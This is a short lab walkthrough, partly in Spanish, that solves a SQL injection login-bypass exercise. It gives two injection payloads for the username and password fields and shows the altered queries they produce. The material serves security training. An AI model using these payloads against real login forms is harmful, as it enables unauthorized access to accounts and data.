02 Lab: SQL injection vulnerability allowing login bypass

Objetivo

This lab contains a SQL injection vulnerability in the login function.

To solve the lab, perform a SQL injection attack that logs in to the application as the administrator user.

Solución

Modificamos el campo usuario utilizando el valor administrator'-- De esta manera podremos acceder al panel de administración

SELECT * FROM USERS WHERE username = '$user' and password = '$password'
$usuario = "administrator'-- "
SELECT * FROM USERS WHERE username = 'administrator'--' and password = '$password'

Alternativa

Cambiamos los parámetros usuario y contraseña con los campos administrator y 'OR'1'='1'--

$usuario = "administrator"
$contraseña = "'OR'1'='1'--"
SELECT * FROM USERS WHERE username = 'administrator' and password = '' OR '1'='1'--

Previous01 Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data Next04 Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft

Last updated 5 months ago